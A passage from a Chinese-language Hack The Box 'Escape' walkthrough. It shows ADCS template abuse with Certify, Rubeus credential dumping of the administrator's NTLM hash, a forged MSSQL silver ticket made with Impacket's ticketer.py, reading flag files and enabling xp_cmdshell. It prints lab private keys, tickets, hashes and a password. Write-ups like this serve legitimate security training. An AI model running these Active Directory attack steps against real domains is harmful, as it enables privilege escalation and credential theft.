4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
*Evil-WinRM* PS C:\programdata> .\Certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:administrator

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.1.0

[*] Action: Request a Certificates

[*] Current user context    : sequel\Ryan.Cooper
[*] No subject name specified, using current context as subject.

[*] Template                : UserAuthentication
[*] Subject                 : CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] AltName                 : administrator

[*] Certificate Authority   : dc.sequel.htb\sequel-DC-CA

[*] CA Response             : The certificate had been issued.
[*] Request ID              : 14

[*] cert.pem         :

-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAtBgKNxFL7Q800mUoE7O8f2n5A28GL72XmJlDeeSxuKac7SoO
ovM9OwUSFfZeLYp/NJgCvDNq7eouR9A/yT22e5KJP6O9v3DmYwWzR2LgzxPsF9A/
XIHWP8jWj+HIoFecwuPWnyoDbHd57vLv8qwpbjavPXrESTuCbQguCwGXPT8mSTsN
SWrWOCizxlOVTL1n2ro9Wdux9BThrhHg9v/G5SWqv2MQGlvr/5fuS/jzvNs6BLIA
FajSi7XchQSBuptp5wQsHkNIkQfA6H64AAxLFtBjUMTEI5bdMLNMZcTQ9DedaaWo
yT9TDEdwoUFi9PC5J7WVn+2+IVDr6CRdhF8aAQIDAQABAoIBAQCf6PipDOKuC+KL
Lub3F5E4UZCaS+riWSZSiUQw57AmlUqiC8YTSogD7+yvM6NMLL3mpVNIaR95QYb2
nSMGPZXbA7J6n5nMcyMeqeEWceXL+ZSZUH/yVBc5a8uY1pKeTS0Un9niWhvQJAZQ
9cW5ZMUk58mSfX/sxrp4tdqsSy1PY1X6qd7fojql0GvIHQAKWaDsziyfaevWV6I6
evBwwVLhu7ZsZPwCFN9SoDs281FNYWGSA2fBVoTPtT/sz3gLouugZ3+k+Epx/HLM
vAdDSWCSsDYkzPlAOtw8wroHqUA8pEKfzk32iOqO5odOREdhWdtjpPKIkjl1Pgld
Sv4NA81BAoGBANYJAHp4NyRGCmS+NfoXNDChmCEoVd1clroC3om9w/HFqgRB/xQW
6VjzwsStjn82j/tzDWd/BA/JTUMP+syy8H4HemBqQd+Aru0/fX92QFNLsCUBba3Y
nTktRgwA+iYiSFnUtS6OIWj/1osXsLs0LBesiC07kjefPpljBfv+GHC/AoGBANdn
b3aMx77cmfkNARA7Q+eWHoyc+dmolOxAk18yQfCzlbpxufYR34dCLIXvlEyunUAs
Q0b8/rBuZE6yRyJdEe/e5BpXey8E6fH09U7Ipm8wMv+AhweYGhrdWgF959fpoq93
3XuMCEzoreU8Fm/7LzZKrcSKWI9qG1aNecPAIGU/AoGAXqNoVL6nEyDtI5J/Z2+v
IfmxvKeLH+/6rZDrOVhxNYxDGtLbqNRgpXZTHofnRBSqIXLD8IlXEGvf/9EnAi/0
6qT/1XXmXp8Vuc2i/iMZWjtTTWmOR5pKGqgMGu6rrQTnnODSpB0wZK8K/EGjYYM2
I9mj9OwsQO/mzAfe84ds4x0CgYBUfvKuYlMIf6i2lW9RWq4sbirVpc4sn4CrnDkz
IpfTP98AIBR+fkxc1ox4jZ5y5hwxTCun8R5HP0aByFU3GaMroReBbceYjijnDNwd
Z4BCJXob1+MgC35SA3qHE0ia3b8/bZmoGSo4YR21ynhSvQmsFmdLralHuKu4rA6T
xw3uKQKBgGuPZ6mecgQxTCFA2qOKsDuHHvwAcBCD6OpvCbc503HHiz483JOGD/kR
HmmUWE+qtk2/6MwJoalIGpcG0AqDPnRvQzIpUsYcbWjfXau88IztpUc9GAcdZlxD
vj3SOtueUwokYTFHdj0QrI34MIk9oauGdPPEAdVsNcq4GGFNcXeh
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIGEjCCBPqgAwIBAgITHgAAAA5SZbT/DsiCAwAAAAAADjANBgkqhkiG9w0BAQsF
ADBEMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGc2VxdWVs
MRUwEwYDVQQDEwxzZXF1ZWwtREMtQ0EwHhcNMjMwNjE5MTM0MDUzWhcNMjUwNjE5
MTM1MDUzWjBTMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYG
c2VxdWVsMQ4wDAYDVQQDEwVVc2VyczEUMBIGA1UEAxMLUnlhbi5Db29wZXIwggEi
MA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQC0GAo3EUvtDzTSZSgTs7x/afkD
bwYvvZeYmUN55LG4ppztKg6i8z07BRIV9l4tin80mAK8M2rt6i5H0D/JPbZ7kok/
o72/cOZjBbNHYuDPE+wX0D9cgdY/yNaP4cigV5zC49afKgNsd3nu8u/yrCluNq89
esRJO4JtCC4LAZc9PyZJOw1JatY4KLPGU5VMvWfauj1Z27H0FOGuEeD2/8blJaq/
YxAaW+v/l+5L+PO82zoEsgAVqNKLtdyFBIG6m2nnBCweQ0iRB8DofrgADEsW0GNQ
xMQjlt0ws0xlxND0N51ppajJP1MMR3ChQWL08LkntZWf7b4hUOvoJF2EXxoBAgMB
AAGjggLsMIIC6DA9BgkrBgEEAYI3FQcEMDAuBiYrBgEEAYI3FQiHq/N2hdymVof9
lTWDv8NZg4nKNYF338oIhp7sKQIBZAIBBTApBgNVHSUEIjAgBggrBgEFBQcDAgYI
KwYBBQUHAwQGCisGAQQBgjcKAwQwDgYDVR0PAQH/BAQDAgWgMDUGCSsGAQQBgjcV
CgQoMCYwCgYIKwYBBQUHAwIwCgYIKwYBBQUHAwQwDAYKKwYBBAGCNwoDBDBEBgkq
hkiG9w0BCQ8ENzA1MA4GCCqGSIb3DQMCAgIAgDAOBggqhkiG9w0DBAICAIAwBwYF
Kw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFIiQhwSuIlv/oasHyBsBGTf3BqYO
MCgGA1UdEQQhMB+gHQYKKwYBBAGCNxQCA6APDA1hZG1pbmlzdHJhdG9yMB8GA1Ud
IwQYMBaAFGKfMqOg8Dgg1GDAzW3F+lEwXsMVMIHEBgNVHR8EgbwwgbkwgbaggbOg
gbCGga1sZGFwOi8vL0NOPXNlcXVlbC1EQy1DQSxDTj1kYyxDTj1DRFAsQ049UHVi
bGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlv
bixEQz1zZXF1ZWwsREM9aHRiP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q/YmFz
ZT9vYmplY3RDbGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCBvQYIKwYBBQUHAQEE
gbAwga0wgaoGCCsGAQUFBzAChoGdbGRhcDovLy9DTj1zZXF1ZWwtREMtQ0EsQ049
QUlBLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNv
bmZpZ3VyYXRpb24sREM9c2VxdWVsLERDPWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/
b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTANBgkqhkiG9w0BAQsF
AAOCAQEACoeksTIvAowxHwtFJL0lrLwnrpkKCs8AWwsSKPSmXQ2uEHPkr/IRFNCq
SMbwjEM411Dkhl/DHi92ru0fjLyZNTQCa6EGB9EgHfUkcclQpp28/F9idCO750FR
dWqVnth+wEnhdyndqFNUJcFZk3U8T9YQpGqBFfLH3NhuXdKRJOktWXQgvT0lSoXZ
Pwkxol0qB9RDdp3CI53RFdRE2wfbfdrtNJp3Rpja7IuaqWG/KFEpOhbdMJIc9VQN
z2A0fkTicxgKpAmL+Pdw3TfV6LTCW4KctCPOKi7mTvGpB+VF70AaCtEFbYrtsHSB
1cIrahApSyz9AAknrpE32s8r8tshIw==
-----END CERTIFICATE-----


[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx



Certify completed in 00:00:14.7055362

README和输出的末尾都显示了下一步。把从—–BEGIN RSA PRIVATE KEY—–到—–END CERTIFICATE—–的所有内容复制到kali的主机上的一个文件中,并使用给定的命令将其转换为.pfx,在提示时不输入密码:

1
2
3
4
5
6
7
8
┌──(root💀kali)-[~/hackthebox/machine/escape]
└─# openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Enter Export Password:
Verifying - Enter Export Password:

┌──(root💀kali)-[~/hackthebox/machine/escape]
└─# ls -la cert.pfx
-rw------- 1 root root 3425 Jun 19 09:52 cert.pfx

上传cert.pfx和Rubeus.exe,以及Rubeus(从SharpCollection下载),然后运行asktgt命令,将证书传递给它以administrator身份获得TGT:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
*Evil-WinRM* PS C:\programdata> upload cert.pfx

Info: Uploading /root/hackthebox/machine/escape/cert.pfx to C:\programdata\cert.pfx

Data: 4564 bytes of 4564 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\programdata> upload Rubeus.exe

Info: Uploading /root/hackthebox/machine/escape/Rubeus.exe to C:\programdata\Rubeus.exe

Data: 563200 bytes of 563200 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\programdata> .\Rubeus.exe asktgt /user:administrator /certificate:C:\programdata\cert.pfx

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.0.1

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] Building AS-REQ (w/ PKINIT preauth) for: 'sequel.htb\administrator'
[+] TGT request successful!
[*] base64(ticket.kirbi):

      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

  ServiceName              :  krbtgt/sequel.htb
  ServiceRealm             :  SEQUEL.HTB
  UserName                 :  administrator
  UserRealm                :  SEQUEL.HTB
  StartTime                :  6/19/2023 7:08:43 AM
  EndTime                  :  6/19/2023 5:08:43 PM
  RenewTill                :  6/26/2023 7:08:43 AM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable
  KeyType                  :  rc4_hmac
  Base64(key)              :  NGN8YkXjv+npWzE3glTOrg==
  ASREP (key)              :  15BE0183651E57504615199D79D431BA

然而,Rubeus试图将返回的票证直接加载到当前终端中,所以从理论上讲,一旦运行它,就可以进入administrator的文件夹并获得flag。然而,这并不适用于Evil-WinRM。

相反,使用/getcredentials /show /nowrap运行相同的命令。会转储有关该帐户的密码凭证信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
*Evil-WinRM* PS C:\programdata> .\Rubeus.exe asktgt /user:administrator /certificate:C:\programdata\cert.pfx /getcredentials /show /nowrap

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.0.1

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] Building AS-REQ (w/ PKINIT preauth) for: 'sequel.htb\administrator'
[+] TGT request successful!
[*] base64(ticket.kirbi):

      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

  ServiceName              :  krbtgt/sequel.htb
  ServiceRealm             :  SEQUEL.HTB
  UserName                 :  administrator
  UserRealm                :  SEQUEL.HTB
  StartTime                :  6/19/2023 7:10:32 AM
  EndTime                  :  6/19/2023 5:10:32 PM
  RenewTill                :  6/26/2023 7:10:32 AM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable
  KeyType                  :  rc4_hmac
  Base64(key)              :  qsYHqNw7wdiSCV8wdcq3jQ==
  ASREP (key)              :  0A4A84695595EA2E6C8D156B44ABB6E5

[*] Getting credentials using U2U

  CredentialInfo         :
    Version              : 0
    EncryptionType       : rc4_hmac
    CredentialData       :
      CredentialCount    : 1
       NTLM              : A52F78E4C751E5F5E17E1E9F3E58F4EE

最后一行是管理员帐户的NTLM hash。

Silver Ticket

背景

Escape “非预期”

在Escape中有一条涉及Silver Tickets的攻击路径。这个路径是在HTB测试中检测到的,但是team和box作者决定保留它,因为在这个场景中没有好的方法来修复,并且这个攻击路径被评估为更难发现,并且和预期的攻击路径一样困难。

Silver Tickets

Silver Tickets 攻击详细介绍How Attackers Use Kerberos Silver Tickets to Exploit Systems

  • Silver Ticket Attack

通常,想对MSSQL进行身份验证时,为服务原则名称(SPN)请求Kerberos票据。该请求转到密钥分发中心(KDC)(通常是域控制器),在那里查找与该SPN关联的用户,检查被请求的用户是否应该具有访问权限,经过几轮通信后,返回用户的票据,并用服务帐户的NTLM hash对其进行加密。现在,当用户将该票据提供给服务时,服务可以将其解密并将其用作身份验证。

在银票攻击中,所有与DC的通信都被跳过。攻击者伪造服务票证(也称为TGS),并用服务帐户的NTLM对其进行加密。

Escape的攻击策略

有sql_svc帐户的NTLM hash。MSSQL服务没有分配SPN(如果分配了SPN,可以要求DC生成一个用sql_svc的hash加密的服务票据,然后对其进行修改)。不过,不需要DC。可以使用Impacket工具在本地伪造一个服务票据,用sql_svc的NTML hash加密它,然后连接到MSSQL。这个票据将不能在任何其他服务上工作,但将能够在MSSQL上模拟任何用户。

信息收集

概述

为了生成一张银票,使用ticketer.py,需要以下信息:

  • sql_svc的NTLM hash
  • 域SID
  • 域名
  • SPN(不一定是有效的SPN)
  • 要模拟的用户的名称

现在已经有了sequel.htb的域名。

NTLM Hash

已经获得了sql_svc的密码,但是需要NTLM hash。有很多在线工具可以计算NTLM Hash Generator

可以使用Python,使用hashlib, NTLM是一个MD4具有UTF-16小端编码的密码:

1
2
3
>>> import hashlib
>>> hashlib.new('md4', 'REGGIE1234ronnie'.encode('utf-16le')).digest()
b'\x14C\xec\x19\xdaM\xacO\xfc\x95;\xca\x1bW\xb4\xcf'

使用hex()打印:

1
2
>>> hashlib.new('md4', 'REGGIE1234ronnie'.encode('utf-16le')).digest().hex()
'1443ec19da4dac4ffc953bca1b57b4cf'

Domain SID

Get-ADDomain返回关于域的信息,包括SID:

1
2
*Evil-WinRM* PS C:\programdata> Get-ADDomain | fl DomainSID
DomainSID : S-1-5-21-4078382237-1492182817-2568127209

Silver Ticket

生成

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
┌──(root💀kali)-[~/hackthebox/machine/escape]
└─# ticketer.py -nthash 1443ec19da4dac4ffc953bca1b57b4cf -domain-sid S-1-5-21-4078382237-1492182817-2568127209 -domain sequel.htb -spn doesnotmatter/dc.sequel.htb administrator
Impacket v0.9.25.dev1 - Copyright 2021 SecureAuth Corporation

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for sequel.htb/administrator
[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Saving ticket in administrator.ccache

它计算必要的信息并将TGS保存在administrator.ccache中。使用KRB5CCNAME环境变量告诉系统使用该服务票证进行身份验证。可以通过运行export KRB5CCNAME=administrator来完成。通过包含KRB5CCNAME=administrator。在每个命令之前使用ccache(使用它来显示使用它的位置)。

连接

有了这个票据,就可以以管理员身份向MSSQL进行身份验证:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(root💀kali)-[~/hackthebox/machine/escape]
└─# ntpdate -u dc.sequel.htb                                                                                                      1 ⨯
2023-06-19 12:35:11.302698 (-0400) +1.961441 +/- 0.163425 dc.sequel.htb 10.10.11.202 s1 no-leap
CLOCK: time stepped by 1.961441

┌──(root💀kali)-[~/hackthebox/machine/escape]
└─# KRB5CCNAME=administrator.ccache mssqlclient.py -k dc.sequel.htb
Impacket v0.9.25.dev1 - Copyright 2021 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL>

读取flag

在这里,可以作为administrator从box中读取文件:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
┌──(root💀kali)-[~/hackthebox/machine/escape]
└─# ntpdate -u dc.sequel.htb
ntpdig: no eligible servers

┌──(root💀kali)-[~/hackthebox/machine/escape]
└─# ntpdate -u dc.sequel.htb                                                                                                      1 ⨯
2023-06-19 12:35:11.302698 (-0400) +1.961441 +/- 0.163425 dc.sequel.htb 10.10.11.202 s1 no-leap
CLOCK: time stepped by 1.961441

┌──(root💀kali)-[~/hackthebox/machine/escape]
└─# KRB5CCNAME=administrator.ccache mssqlclient.py -k dc.sequel.htb
Impacket v0.9.25.dev1 - Copyright 2021 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL> SELECT * FROM OPENROWSET(BULK N'C:\users\ryan.cooper\desktop\user.txt', SINGLE_CLOB) AS Contents
BulkColumn

---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

b'47e8a7ffa5ff5b79ea0eeb5906ec2a46\r\n'

SQL> SELECT * FROM OPENROWSET(BULK N'C:\users\administrator\desktop\root.txt', SINGLE_CLOB) AS Contents
BulkColumn

---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

b'427e2e823cf867a7a25b8f6d9943be9b\r\n'

命令执行

xp_cmdshell仍然被禁用,但与sql_svc不同,administrator用户有权限启用它:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
SQL> xp_cmdshell whoami
[-] ERROR(DC\SQLMOCK): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
SQL> EXECUTE sp_configure 'show advanced options', 1
[*] INFO(DC\SQLMOCK): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL> RECONFIGURE
SQL> EXECUTE sp_configure 'xp_cmdshell', 1
[*] INFO(DC\SQLMOCK): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> RECONFIGURE
SQL> xp_cmdshell whoami
output

--------------------------------------------------------------------------------

sequel\sql_svc

NULL

这些命令仍然作为sql_svc身份运行。这是因为sql_svc仍然是运行MSSQL服务的进程。它只能与操作系统协商以administrator身份读取文件,因为有那个票据。

使用administrator身份读写文件,可以将其转换为administrator身份执行。这个PayloadsAllTheThings页面展示了各种方法。HackBack中展示了DiagHub方法,尽管后来打了补丁。在Proper中展示了WerTrigger方法,仍然有用。

Reference Sources

  • 0xdf’s blog Escape walkthrough
  • HTB’s official Escape walkthrough
  • Responder
  • SharpCollection
  • Certify
  • Investigating Certificate Template Enrollment Attacks – (ADCS)
  • certipy
  • Silver Ticket Attack
  • How Attackers Use Kerberos Silver Tickets to Exploit Systems